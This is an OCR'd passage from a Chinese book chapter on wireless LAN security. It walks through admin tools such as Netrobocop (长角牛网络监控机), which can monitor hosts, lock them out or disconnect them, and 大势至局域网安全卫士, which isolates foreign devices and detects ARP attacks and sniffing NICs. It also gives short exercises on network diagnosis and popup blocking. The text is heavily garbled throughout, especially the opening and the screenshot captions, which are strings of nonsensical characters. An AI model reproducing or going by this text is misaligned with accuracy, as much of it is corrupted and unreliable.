局 避 吉 生 潮 和 网卡 江 录 模式 检测 工具 ( 仅 全 本 村 浊 6) 
工具 对 太 筠 至 (北京 pe 


么 和 网 管 网 卡 妥 3 便民 从 
胸肌 外 了 了 要 代 区 到 下 3 电 车 ， 从 而 本 以 坊 目 记 网 电 及 队伍 安装 入 次 件 、 隐 由 安 半 Srifi 
近 软 叶 、 功 止 安 扫 Wireshark 列 探 坎 伯 等 “从 而 更 好 地 保 沪 内 网 的 网 阁 雪 主 和 商业 机 二 . 


Et 

术 CRemate Managemenm MTechnology , 障 了 kRMT ) 县 一 灶 允 山城 

RM ne 

全 合议 件 ,网管 人 天 可 以 关 现 洒 阳 场 允 局 岳 ( 单个 或 着 科 量 ) 运行 近 得 开斋、 光标 机 ， 近 检 

ee he 
起 服务 于 企业 的 网 交管 理 . 


在 “ 聚 生 网 管 ” 主 窗口 中 ， 单 击 “ 全 局 
设置 ”按钮 ， 即 可 打开 “运行 设置 ”对 话 框 ， 
在 “系统 设置 ”选项 下 可 以 对 软件 启动 、 托 
盘 图 标 、 呼 出 热 键 、 密 码 保护 、 软 件 CPU 占用 
设置 等 属性 进行 相应 的 设置 ， 如 下 图 所 示 。 
国运 FE 重 x 
人 
全 动 2 

De 站 SS 让。 

[LS DRS 

口 和 es 外 中 jE 芭 本 条 加 吉 - 生 启 软件 全 欢 

DR [出 4 对 重启 软件 生 灼 

Ossteawxn ha 图 s [天 

sea 3] 


分 --- 重 让 生效 
且 要 流 朗 :[ 30。 建议 不 要 可 50) 


加 记录 8 志 到 [SQtite | 数据 车， 并 日 涯 E 赤 达到 |500 | MS 动 入 份 并 创建 NS 掺 库 。 
口交 必得 二 -本 有 如 :ALT + 站 
回放 ES 宇 S 示 E23 .73 
三 
请 多 在 右 人 年 + 按 加 健 。 无 
人 Ee 一 
让 扫 刍 : ALT+F1 ) 
x: | ] 
容 从 运行 PU 占用 2 主 。| 吏 CPU 二 用 和 司 (Eees 效 ) 
| 


step 图 选择 “优先 级 设置 ”选项 卡 ， 在 其 
中 即 可 对 软件 进行 优先 级 设置 ， 设 置 完毕 
后 ， 单 击 “保存 设置 ”按钮 即 可 ， 如 下 图 


所 示 。 
E73 x 
素 纹 设 年 估 于 SIR 重 
软件 优先 豚 训 重 
回 启用 网 过 应 用 优先 航 设 轩 (QOS 
口 引用 全 局 白 名 所 设 千 。 门 局 用 全 局 寺 名 皇 设 过 
| 
期 除 
再 = 
SS 
导入 
口 刷 基 于 协议 行伍 的 优 先 二 程 序 竺 类 2 
QA 文件 
09 而 加 


14.4.2 ”长 角 牛 网 络 监控 机 


长 角 牛 网 络 监控 机 《网 络 执法 官 ) 只 

一 台 机 器 上 运行 ， 可 穿 透 防火 墙 ， 实 
时 监控 、 记 录 整 个 无 线 局 域 网 用 户 上 线 情 
况 ， 可 限制 各 用 户 上 线 时 所 用 的 IP、 时 段 ， 
并 可 将 非法 用 户 踢 下 无 线 局 域 网 。 本 软件 
适用 范围 为 无 线 局 域 网 内 部 ， 不 能 对 网 关 
或 路 由 器 外 的 机 器 进行 监视 或 管理 ， 适 合 
无 线 局 域 网 管理 员 使 用 。 


1. 查看 主机 信息 


利用 该 工具 可 以 查看 无 线 局 域 网 中 
各 个 主机 的 信息 ， 例 如 用 户 属 性 、 在 线 记 
录 、 记 录 查 询 等 ， 其 具体 操作 步骤 如 下 : 
step 加 在 下 载 并 安装 “长 角 牛 网 络 监控 
机 ”软件 之 后 ， 选 择 “ 开 始 ” 一 “所 有 应 
用 ”一 Netrobocop 菜 单项 ， 即 可 打开 “设置 
监控 范围 ”对 话 框 ， 如 下 图 所 示 。 
[step 图 在 设置 完 网 卡 、 子 网 、 扫 描 范 围 等 属 
性 之 后 ， 单 击 “ 添 加 /修改 ”按钮 ， 即 可 将 
设置 的 扫描 范围 添加 到 “监控 如 下 子 网 及 了 
段 ” 列表 中 ， 如 下 图 所 示 。 
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更 

#3 lm DT 一 [TIEGTE 
出 t 下 了 网 有 rr 外 : 元 障 
| -TB | 


手工 扣 作 ， 取消 自 动 运行 


| 着 | 确定 


TO 
or IO/IDVID one 
现 ee 158.0.1 ~ 192.168.0.254] =] | 
后 : JIEDT -9 6 0.251 | 深入 
上 近 如 于 同 抽 欧 障 
[E27 I | 


手工 担 作 ， 取 消 自动 运行 > 


| 确定 
step 图 选中 刚 添 加 的 IP 段 后 ， 单 击 “ 确 定 ” 


按钮 ， 即 可 打开 “长 角 牛 网 络 监控 机 ” 主 
窗口 ， 在 其 中 即 可 看 到 设置 IP 地 址 段 内 的 主 
机 的 各 种 信息 ， 例 如 网 卡 权 限 地 址 、IP 地 
址 、 上 线 时 间 等 ， 如 下 图 所 示 。 


To op 


ra er De EN 


[Sep 在 “长 角 牛 网 络 监控 机 ”窗口 的 计算 
机 列表 中 双击 需要 查看 的 对 象 ， 即 可 打开 
“用 户 属性 ”对 话 框 ， 如 下 图 所 示 。 


[ET 


DR 户 | 关闭 
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SS” 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


[tes 图 单 去 “历史 记录 ”按钮 ， 即 可 打开 
“在 线 记录 ”对 话 框 ， 在 其 中 查看 该 计算 
机 上 线 情况 ， 如 下 图 所 示 。 


ET x 


几 记 ,5000050 [在 二 家 辣 在 产 | 训 下 十] 
生得: FEF 宗主 

EE 

[TEENIE 


匡 7 主 页 7 月 


上 吉 班 
RCR 7 A610 区 


EE 


美 闭 


[step 园 单 去 “导出 ”按钮 ， 即 可 将 该 计算 机 
的 上 线 记录 保存 为 文本 文件 ， 如 下 图 所 示 。 


轩 Tem5E93 -记事 本 口 x 
文件 (” 搓 (E)】 从 式 (O) 查看 (V) Sa 

区 牛 网 络 话 控 机 ] 用 击 缚 计 

| 路 1 了 0 ie 
接 0 次 ， 是 训 浊 


和 08-15 09:39:52 。 


国光 各 


加 斌 ， ,是 否 合法 , TP, 组 /主机 /用 户 ,上 线 时 间 , 下 线 时 间 , 下 线 原因 


192. 168. 0, 112, YOREGROUP / AFOIG-611211054 / AFOIG-6112 


pp 
击 “ 记 录 查 询 ” 按 钮 ， 即 可 打开 “记录 查 
询 ” 窗 口 ， 如 下 图 所 示 。 


rene ie Fi0 Cr EE 


[step 国 在 “用 户 ” pp 
户 对 应 的 网 卡 地 址 ; 在 “在 线 时 间 ” 文 本 框 中 
设置 该 用 户 的 在 线 时 间 ， 然 后 单 击 “查找 ” 
按钮 ， 即 可 找到 该 主机 在 指定 时 间 的 记录 ， 

如 下 图 所 示 。 
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后 ea TY 


step 图 在 “证 网 站 蚊 撤 ” 窗口 中 单 击 


“本 机 状态 ”选项 ， 即 可 打开 “本 机 状态 
信息 ”窗口 。 在 其 中 即 可 看 到 本 计算 机 的 
网 卡 参数 、IP 收 发 、TCP 收 发 、UDP 收 发 等 
信息 ， 如 下 图 所 示 。 


en 


en mem 
FET Er 
Fem 


I 


[moro a or 和 


Ee 在 RPR 机” 窗口 中 单 

击 “ 服 务 监测 ”选项 ， ed “服务 监 

测 ” 窗 口 ， 在 其 中 即 可 进行 服务 器 的 添 
、 修 改 、 删 除 等 操作 ， 如 下 图 所 示 。 


EE 


2. 设置 无 线 局 域 网 


除 收集 无 线 局 域 网 内 各 个 计算 机 的 信 
息 之 外 ，“ 长 角 牛 网 络 监控 机 ”工具 还 可 
以 对 无 线 局 域 网 中 的 各 个 计算 机 进行 网 络 
管理 ， 可 以 在 无 线 局 域 网 内 的 任 一 台 计 算 
机 上 安装 该 软件 ， 来 实现 对 整个 无 线 局 域 
网 内 的 计算 机 进行 管理 。 
其 具体 的 操作 步骤 如 下 : 

EO 在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 
“设置 ”一 “关键 主机 组 ”命令 项 ， 即 可 
打开 “关键 主机 组 设置 ”对 话 框 ， 在 “ 选 
择 关键 主机 组 ”下 拉 框 中 选择 相应 的 主机 
组 ， 并 在 “组 名 称 ” 文 本 框 中 输入 相应 的 名 
称 之 后 ， 再 在 “组 内 IP” 列 表 框 中 输入 相应 
的 IP 组 。 最 后 单 击 “ 全 部 保存 ”按钮 ， 即 可 
完成 关键 主机 组 的 设置 操作 ， 如 下 图 所 示 。 


关键 主机 组 设置 x 
选择 关键 主机 组 。 [EE 3 | 
组 名 称 : [group 机 
组 内 IP; 
1, .0.0.0 2. Jo.0.0.0 3. Ro.o.0.0 
4. -0-0.0 5. .0.0.0 6. 后 0.00 
7. jo.0.0.0 8. .0.0.0 9. |b.o.0.0 
10. fb.0.0.0 11. |.0.0.0 12. |.0.0.0 
13, [0.0.0.0 14. |.0.0.0 15. 0.0.0.0 
16. Jo.0.0.0 17. 有 .0.0.0 18. 后 .0.0.0 
全 部 保存 取消 
和 侈 提示 : “关键 主机 组 ”是 由 管理 员 指 定 


的 了 地 址 ， 可 以 是 网 关 、 其 他 计算 机 或 服务 
器 等 。 管 理 员 将 指定 的 IP 存 入 “关键 主机 
组 ”之 后 ， 即 可 令 非 法 用 户 仅 断 开 与 “ 关 
键 主机 组 ”的 连接 而 不 断 开 与 其 他 计算 机 
的 连接 。 

[step 图 在 “长 角 牛 网 络 监 控 机 ”窗口 中 选择 
“设置 ”一 “默认 权限 ”菜单 项 ， 即 可 打 
开 “ 用 户 权限 设置 ”对 话 框 ， 选 择 “ 受 限 
用 户 ， 著 违反 以 下 权限 将 被 管理 ” 单 选 按 
钮 之 后 ， 设 置 “IP 限 制 ”“ 时 间 限 制 ” 和 
“组 /主机 /用 户 名 限制 ”等 。 这 样 当 目 标 计 
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算 机 与 无 线 局 域 网 连接 时 ，“ 长 角 牛 网 络 
监控 机 ”将 按照 设 定 的 选项 对 该 计算 机 进 
行 管理 ， 如 下 图 所 示 。 
用 户 和 陋 设 秆 x 
设置 新 月 户型 认 权 限 。 

设置 权限 

他 自由 用 户 ， 与 网 络 连接 不 受 限 钊 。 

和 车 诸 反 以 下 权限 将 被 管理 。 


厂 启 和 r 


厂 超 s 忆 ”天 未 上 线 II 设 为 怀 目 用 户 
个 禁止 用 户 ， 发 现 该 用 户 上 线 即 管理 * 
对 违反 以 上 权限 用户， 将 自动 技 以 下 方式 进行 管理 。 
ee 频 计 : 5 = 
[ES 


时 
Ls | 歌 司 主机 | 
保存 ]| 取消 | 


嘎 制 | 哟 贴 || suGEm) | 


可 以 利用 “长 角 牛 网 络 监控 机 ”工具 
保护 指定 的 IP 地 址 段 。 在 “长 角 牛 网 络 监控 
机 ”窗口 中 选择 “设置 ”一 “IJIP 保 护 ” 菜 单 
项 ， 即 可 打开 “IP 保 护 ” 对 话 框 。 在 其 中 设 
置 要 保护 的 IP 段 后 ， 单 击 “ 添 加 ”按钮 ， 即 
可 将 该 IP 段 添加 到 “已 受 保护 的 IP 段 ”列表 
中 ， 如 下 图 所 示 。 

[7 


te 请 拓 扫 


设置 受 保护 IP 


指定 IP 段 已 受 保护 的 IP 段 
Mearesor— [01] 192. 168.0.1 - 192.168.0.254 
到 Jisz. 1660254 
添加 > 
腹 除 “< 


a 


[step 园 在 “长 角 牛 网 络 监 控 机 ”工具 中 还 
可 以 设置 敏感 主机 。 在 “长 角 牛 网 络 监控 
机 ”窗口 中 选择 “设置 ”一 “敏感 主机 ” 
菜单 项 ， 即 可 打开 “设置 敏感 主机 ”对 话 
框 ， 在 “敏感 主机 MAC” 文 本 框 中 输入 目 
标 主机 的 MAC 地 址 后 单 击 _» | 按钮 ， 即 可 
将 该 主机 设置 为 敏感 主机 ， 如 下 图 所 示 。 
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黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


可 以 添加 新 的 用 户 。 在 “长 角 牛 网 络 监控 
机 ”窗口 中 选择 “用 户 ” 一 “添加 用 户 ” 
菜单 项 ， 即 可 打开 New user 对 话 框 ， 在 
MAC 文 本 框 中 输入 新 用 户 的 MAC 地 址 后 ， 
单 击 “ 保 存 ” 按 钮 即 可 实现 添加 新 用 户 操 
作 ， 如 下 图 所 示 。 


WC: 50-10-24-56-69-08 


注释 : 民工 用 入，201706-15 09:80。 


亢 王 |] 取消 | 


step 国 在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 


保存 | 


step 图 在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 
“设置 ”一 “远程 控制 ”菜单 项 ， 即 可 打 
开 “ 远 程控 制 ” 对 话 框 ， 在 其 中 选中 “ 接 
受 远 程 命令 ” 复 选 框 ， 并 输入 目标 主机 的 卫 


地 址 和 口令 后 ， 即 可 对 该 主机 进行 远程 控 
制 ， 如 下 图 所 示 。 
ET x 
接 茹 远程 命令 并 作出 相应 的 科 制 损 作 。 
要 榨 设 轩 
太 接 枕 寺 程 命令 
对 方 IP 192. 168..0. 102| 
对 hntcp: [Ti 
ps 


J 取消 测试 更 多?> 
[step 较 在 “长 角 牛 网 络 监控 机 ”窗口 中 选择 
“设置 ”一 “主机 保护 ”菜单 项 ， 即 可 打 
开 “ 主 机 保护 ”对 话 框 ， 在 选中 “启用 主 
机 保护 ” 复 选 框 后， 输入 要 保护 主机 的 了 地 
a 训 和 并 多 


即 可 将 该 主机 添加 到 “ 受 保护 主机 ”列表 
中 ， 如 下 图 所 示 。 
i x 
Ee ee tM o-] 
sm | ee 


网 卡 地 CE 
a 


村 Ba 时 < > 


厂 保护 全 网 (点 所 机 中 俩 因 ) 


PE 
” 孝 助 | 厂 以 如 下 方式 自动 寺 销 MP 艇 电 
i 厂 | 开 与 所 有 主 梳 连 | 
厂 信用 主 刀 保 护 并 且 语 :不 再 显示 
一 


step 园 在 “长 角 牛 网 络 监控 机 ”工具 中 还 
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“用 户 ” 一 “远程 添加 ”菜单 项 ， 即 可 打 

开 “ 远 程 获取 用 户 ”对 话 框 ， 在 其 中 输入 远 
bat 数据 库 名 称 、 登 录 名 称 以 
及 口令 之 后 ， 单 击 “ 连 接 数据 库 ” 按 钮 ， 即 
可 从 该 远程 主机 中 读 取 用 户 ， 如 下 图 所 示 。 


GE x 
本 加 中 saL 雪 所 中 该 内 户 ， 
0 的 失 


Ek a 


[step 图 如 果 禁 止 无 线 局 域 网 内 某 一 台 计 算 机 
的 网 络 访问 权限 ， 则 可 在 “长 角 牛 网 络 监 
控 机 ”窗口 内 右 击 该 计算 机 ， 在 弹出 的 快 
捷 菜 单 中 选择 “锁定 /解锁 ”选项 ， 即 可 打 
开 “ 锁 定 /解锁 ”对 话 框 ， 如 下 图 所 示 。 


镁 定 / 解 钢 x 


网 卡 : 9-FB-7E-EA-FPC-FA [网 卡 生产 厂家 不 详 ] 
注释 : 阿 卡 生产 厂家 不 详 
警 寺 
请 不 要 对 诸如 路 由 基 、 交 换 机 、 肝 务 器 等 网 络 关键 设备 进行 钠 定 。 
锁定 方式 : 
证 (前 二 ) 
个 禁止 与 以 下 关键 主机 组 的 TCPMIP 连 接 
厂 第 三 第 组 万 务 厂 第 二 
厂 菏 组 厂 第 组 厂 第 三 第 EE 
人 禁止 与 所 有 主机 A 的 TCP/TF 这 接 ( 除 敏 感 主机 外 ) 


确定 取消 


[Sep 加 在 其 中 选择 目标 计算 机 与 其 他 计算 机 
(或 关键 主机 组 ) 的 连接 方式 之 后 ， 单 击 
“确定 ”按钮 ， 即 可 禁止 该 计算 机 访问 相 
应 的 连接 ， 如 下 图 所 示 。 


0 


二 四 大 “长 角 牛 网 络 监 控 机 ”窗口 内 选中 
某 台 计算 机 信息 并 右 击 ， 在 弹出 的 快捷 菜单 
中 选择 “手工 管理 ”选项 ， 即 可 打开 “手工 
管理 ”对 话 框 ， 在 其 中 即 可 手动 设置 对 该 计 
算 机 的 管理 方式 ， 如 下 图 所 示 。 


手工 管理 x 


[mF ame ER7 8 jpg 06 


Statie 
网 卡 : [656-7E-EA-FC-PA [ 癌 卡 生产 厂 未 直译 


注释 : 阿 卡 生产 厂家 不 主 
IP: |192, 168. 0, 105 
名 称 :F7- /= 
去 找 机 后 ; a 
请 不 要 对 诸如 路 由 器 、 交 搞 机 、 服 务 器 等 网 络 关键 设备 进行 管理 。 
管理 方式 
厂 ?冲突 
厂 禁止 与 关键 主机 组 进行 TCF/I 和 连接 
三 第 组 三 | EE 关 雪 机 组 
[ul 可 5 BS 敏感 主机 
厂 禁止 与 所 有 主机 进行 TCF 连接 ( 除 敏感 主机 外 ) 
断 开 方式 | 殉 默 断 开 ”| 厂 高 缴 阳 断 
管理 频率 : | 12 了 帮助 
管理 次 数 :0 
开始 | | 


[Step 图 在 “长 角 牛 网 络 监控 机 ”工具 中 还 可 
以 给 指定 的 主机 发 送 消息 。 在 “长 角 牛 网 
络 监控 机 ”窗口 中 选中 某 台 计算 机 信息 并 
单 击 筷 标 右键 ， 在 弹出 的 快捷 菜单 中 选择 
“发 送 消息 ”选项 ， 即 可 打开 Send message 
对 话 框 ， 在 其 中 输入 要 发 送 的 消息 后 ， 单 
击 “ 发 送 ”按钮 ， 即 可 给 该 主机 发 送 指定 
的 消息 ， 如 下 图 所 示 。 
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Send message x 
,有 开启 了 消息 服务 ， 并 且 被 正确 下 出 名 和 的 用 户 ， 才 能 的 上 到 此 


发 送 至 : 后 -6- 可 -E39-73 [网 下 生产 厂家 不 泽 ] 
1 
入: GD 7 同 卫 科技 7 网吧 所 
发 话 者 - [ 帮 帮 牛 同 晴 丰 近 机 
者 者 ， 朵 晤 有 所 
政 : 隔 


仅 注册 版 能 设置 发 送 者 名 称 及 发 送 次 数 * 


发 送 结束 


14.4.3 ”大 势 至 局 域 网 安全 卫士 


大 势 至 局 域 网 安全 卫士 是 一 款 专业 的 
局 域 网 安全 防护 系统 ， 它 能 够 有 效 地 防止 
外 来 计算 机 接 入 公司 无 线 局 域 网 ， 有 效 隔 
离 无 线 局 域 网 计算 机 ， 并 且 还 有 禁止 计算 
机 修改 IP 和 MAC 地 址 、 检 测 局 域 网 混杂 模 
式 网 卡 、 防 御 局 域 网 ARP 攻 击 等 功能 。 

使 用 大 势 至 局 域 网 安全 卫士 防护 系统 
安全 的 操作 步骤 如 下 。 

下 载 并 安装 大 势 至 局 域 网 安全 卫士 ， 
即 可 打开 “大 势 至 局 域 网 安全 卫士 ”工作 
界面 ， 如 下 图 所 示 。 


章 交办 所 后 后 网 二 全 十 V3 1 - 式 用 所 = | 
天] 访 9 页 竟 。 和 直接 。 卫 素 拷 们 地区 过 机 


请 过 反 同 上 [atvet Water Atheros ASUUGL Glebit Ethermat Controllr ~ | | 并 妈 基 控 


后 名 单 ( 吧 公 司 内 部 所 及 ) 操作 


| 主机 态 醒 和 地 直 工地 下 主轴 名 Ee 
EN 
E23 
By 
EE 

L233 
自 让 天下 | 电脑 /于 从 /二 板 | 直 出 自卫 窗 忆 dp3 拓 线 和 由 器 | 闪光 

加 自生 本 地 址 冯 1 白 二 高 加 自 各 各 uci 机 更 时 自动 有 高 

司 皮 现 Mr 区 二 入 出 和 报信 息 加 发现 局 ur 牙 击 时 自 兴 高 

也 iH 局 。。“ 扳 刘 | 加 检 出 | 亲 香 过 站 时 报 区 检测 | 雪人 

村 名 单 ( 邵 公 司 外 吉 电 及 ) 


启 径 “主机 校 态 神仙 Er EH 
隔 高 方式 
ER 


回 手 二 高 


理 高 
岗 达 而 
回 禹 HB 网 
回 禁止 访 可 外 网 
nt 二 看 中 记录 下 空 流出 记 妓 
ET TE 证 7 隆 
口 强加 中 口 到 


[ep 图 单 二 “开始 监控 ”按钮 ， 即 可 开始 
监控 当前 无 线 局 域 网 中 的 计算 机 信息 ， 对 
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于 无 线 局 域 网 外 的 计算 机 将 显示 在 “ 黑 名 
单 ” 窗 格 之 中 ， 如 下 图 所 示 。 


加 大雪 至 局 类 网 安全 下士 V3.1 - 二 有 后 - D x 
Tt TR EE 卫 天 们 区 过 全 x 寺 
EE Network sdaotss Mheros MADOL Glenbit Eeet Cantrdlee 二 
殷 作 
ET ES i 
SN 
E33 
RR 
3 
入 
和 9 高 | 由 后 / 插 仙 生怕 相册 名 和 二 dg 雹 内 吕 | 检 到 
[GD 
回 更 Ap 东 击 H 租 出 玫 相间 同时 现 忆 站 wp 下 击 时 自动 天 
同 福山 二 K 昌 “天 天 | 巴松 和 本 RHR 要 基山 
里 名 单 ( 阳 公 司 外 部 电脑 ) 
EE FEEEKED i 
A 
口 中 FITTT 300 Ba 
EN Elan 
口 | 加 omezeuwopses jie 1 0108 300 3 
页 
ia 
SD 
网 站 安全 事件 加 下 万 史记 录 。 滞 呈 加 引证 姑 
| ED NO 
口 强 图 中 口 能 


如 果 确 定 某 台 计 算 机 是 无 线 局 域 网 内 的 
计算 机 ， 则 可 以 在 “ 黑 名 单 ” 窗 格 中 选中 该 计 
算 机 信息 ， 然 后 单 击 “ 移 至 白 名 单 ” 按 钮 ， 将 
其 移动 到 “ 白 名 单 ” 窗 格 之 中 ， 如 下 图 所 示 。 


ET 7 
关于 次 ff。 关于 物 。 沪 且 交 网 RN 香 。 联 # 和 条 。 孝昌 。 过 全 妈 
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ET TA EE 0 
mi 
2 男 。 nmnammam Hae lea 9 ing I 
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Wr 
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自 二 高 /村 电 有 / 手 人 / 平 杨 想 末世 自 RaEE48 由 加 六 到 
回 自 吉 间 [7 地址 实 更 时 自 遇 可 区 自 名 六 mc 地址 实 更 村 稀 二 可 
回 皮 珊 0 世 二 时 多 出 密 扫 让 息 [PD 
团 术 WH 本 高 员 地 从 畦 。 “四 | 加 可 人 十 二 上村 扫 可 | 入 则 | 得 作 
时 名 单 (公司 外贸 电 摘 ) 
I En WE 
口 | ooroowroato [be ton.0.107 on EN 
EN Bp 
局 SS 
口 | 夯 _jwtntmeam be tm.0 100 [200 JS 
me 
EE 
可 ii 
网 安全 事件 下 在 让 史记 录 直入 记录 
[mE rE 有 Ld 
〇 要 @ 由 口 习 


step 加 单 去 “自动 隔离 局 域 网 无 线路 由 器 ” 
右 侧 的 “检测 ”按钮 ， 可 以 检测 当前 无 线 
局 域 网 中 存在 的 无 线路 由 器 设备 信息 ， 并 
在 “网 络 安全 事件 ” 窗 格 中 显示 检测 结 
果 ， 如 下 图 所 示 。 
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黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


Pi- 0 x 
FT TR 访 有 关 网 。 划 寺 治 层 。 王 疙 人 。 帮助 这 入 多 
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ET TE ET 增加 


EW Jee 109 .0100 
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BE 
EE 
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回去 现 Mpa 指出 轩 李 信 和 回 总 后 避 4 本 丰 二 时 目 地 8 
J tps | BN | I msl 辣 到 | 要 让 
末 各 单 (人 公司 外 各 电脑) 
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Lr EE Mn 
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单 击 “ 查 看 历史 记录 ”按钮 ， 即 可 打 
开 “IPMAC- 记 事 本 ”窗口 ， 在 其 中 查看 检 
测 结果 ， 如 下 图 所 示 。 

下 pwc-isz 0 x 


文件 (有 入 强 (5) 桥 式 (O) 查看 (V) Ww 
ET 


| 


大 势 至 局 域 网 安全 卫士 常用 功能 介绍 
如 下 。 

CL 
平板 ” 复 选 框 : 禁止 外 部 计算 机 (如 笔记 
本 ) 或 移动 设备 (如 平板 计算 机 或 手机 》 
接 入 单位 无 线 局 域 网 访问 因特网 。 


“自动 隔离 外 来 计算 机 /手机 / 


(2) “自动 隔离 无 线 局 域 网 无 线路 由 
器 ” 复 选 框 : 当 检 测 到 无 线 局 域 网 中 存在 
无 线路 由 器 时 ， 自 动 将 其 隔离 。 

(3) “ 白 名 单 IP 地 址 变更 时 自动 隔 
离 ” 复 选 框 : 禁止 单位 内 部 计算 机 修改 耳 地 
址 ， 防 止 耳 地址 盗用 ， 防 止 卫 冲突 攻击 ， 防 
止 越权 上 网 或 逃避 网 络 监控 。 


(4) “和 白 名 单 MAC 地 址 变更 时 自动 
隔离 ” 复 选 框 : 禁止 单位 内 部 计算 机 修改 
MAC 地 址 。 

(5) “发 现 ARP 攻 击 时 输出 报警 信 
息 ” 复 选 框 ， 当 发 现 ARP 攻 击 时 ， 输 出 报警 
信息 。 

(6) “发 现 无 线 局 域 网 ARP 攻 击 时 自 
动 隔离 ” 复 选 框 ， 当 检测 到 无 线 局 域 网 中 
存在 ARP 攻 击 时 ， 自 动 将 发 出 ARP 攻 击 的 
计算 机 隔离 。 

(7) “检测 并 隔离 无 线 局 域 网 代理 ” 
复 选 框 : 检测 无 线 局 域 网 中 是 否 存在 代理 
服务 器 ， 一 旦 检测 到 就 会 将 其 隔离 。 

(8) “检测 到 混杂 模式 网 卡 时 报警 ” 
复 选 框 : 检测 无 线 局 域 网 内 处 于 混杂 模式 
的 网 卡 ， 防 止 无 线 局 域 网 计算 机 运行 黑客 
软件 、 嗅 探 软件 、 抓 包 软 件 等 ， 当 检测 出 
来 后 给 出 报警 信息 。 


14.5 “实战 演练 
实战 演练 1 一 诊断 和 修复 网 络 不 通 


当 自 己 的 计算 机 不 能 上 网 时 ， 说 明 计 
算 机 与 网 络 连接 不 通 ， 这 时 就 需要 诊断 和 
修复 网 络 了 ， 具 体 的 操作 步骤 如 下 。 
[step 图 打开 “网 络 连接 ”窗口 ， 选 中 需要 诊 
断 的 网 络 图 标 并 右 击 ， 在 弹出 的 快捷 菜单 
中 选择 “诊断 ”选项 ， 弹 出 “Windows 网 络 
诊断 ”窗口 ， 并 显示 网 络 诊断 的 进度 ， 如 下 
图 所 示 。 


司 Windows 网 结论 断 


正在 检测 问题 


第 14 章 无 线 局 域 网 的 安全 防护 


step 图 诊断 完成 后 ， 将 会 在 下 方 的 窗 格 中 显 
示 诊 断 的 结果 ， 如 下 图 所 示 。 


司 Windcws 网 络 双 新 


其 余 修复 操作 再 要 只 有 管理 员 权 限 


已 找到 问题 
通 本 闫 以 太 网 已 亲朋 轩 


罗兰 斌 凡 管理 员 身 份 进行 这 些 修复 
一 浏览 其 他 选项 
二 看 济 井 信息 


关 癌 


单 去“ 尝试 以 管理 员 身 份 进行 这 些 修 
复 ” 链 接 ， 即 可 开始 对 诊断 出 来 的 问题 进 
行 修复 ， 如 下 图 所 示 。 


司 Wndews 网 阁 沙 断 


正在 解决 问题 


正在 验证 是 否 已 骨 网 阁 话 配 器 呈 责 同 是 


CE 


[Sep 图 修复 完毕 后 ， 会 给 出 修复 的 结果 ， 提 
示 用 户 疑 难 解答 已 经 完成 ， 并 在 下 方 显示 
已 修复 信息 提示 ， 如 下 图 所 示 。 


司 Windews 网 络 光 断 


疑难 解答 已 充 成 
司 壬 所 答 忆 对 天 统 进 行 了 一 些 更 放 。 青 尝 江 之 前 曾 兰 斌 执行 的 任务 . 
[ 
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实战 演练 2 一 一 屏蔽 网 页 广告 弹 窗 


Interest Explorer 11 浏 览 器 具有 屏蔽 网 
页 广告 弹 窗 的 功能 ， 使 用 该 功能 屏蔽 网 页 
广告 弹 窗 的 操作 步骤 如 下 。 
[seep 园 在 IE 11 浏 览 器 的 工作 界面 中 选择 “ 工 
具 ” 一 “弹出 窗口 阻止 程序 ”菜单 命令 ， 
如 下 图 所 示 。 


x 
ss 他 


【 EE 国 htpr -8c | 国 ER- 下 
xn war sew ww EE neo 


打开 “弹出 窗口 阻止 程序 ”对 话 框 ， 
提示 用 户 是 否 确实 要 启用 Interest Explorer 弹 
出 窗口 阻止 程序 ， 如 下 图 所 示 。 


全 口 肯 上 程序 


ee epor ete 


a IN) 


单 击 “ 是 ”按钮 ， 即 可 启用 该 功能 ， 
然后 选择 “工具 ”一 “弹出 窗口 阻止 程 
”一 “弹出 窗口 阻止 程序 设置 ”菜单 命令 ， 

如 下 图 所 示 。 
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step 罗 打开 “弹出 窗口 阻止 程序 设置 ”对 话 
框 ， 在 “要 允许 的 网 站 地 址 ”文本 框 中 给 
入 允许 的 网 站 地 址 ， 如 下 图 所 示 。 
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TE er EE 


单 击 “ 添 加 ”按钮 ， 即 可 将 输入 的 网 
站 地 址 添加 到 “允许 的 站 点 ”列表 当中 。 
单 击 “关闭 ”按钮 ， 即 可 完成 弹出 窗口 阻 
止 程序 的 设置 操作 ， 如 下 图 所 示 。 
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14.6 ”小 试 身手 
练习 1: 无 线 局 域 网 查看 工具 的 使 用 。 
练习 2: 无 线 局 域 网 攻击 工具 的 使 用 。 
练习 3: 无 线 局 域 网 安全 辅助 工具 的 
使 用 。 


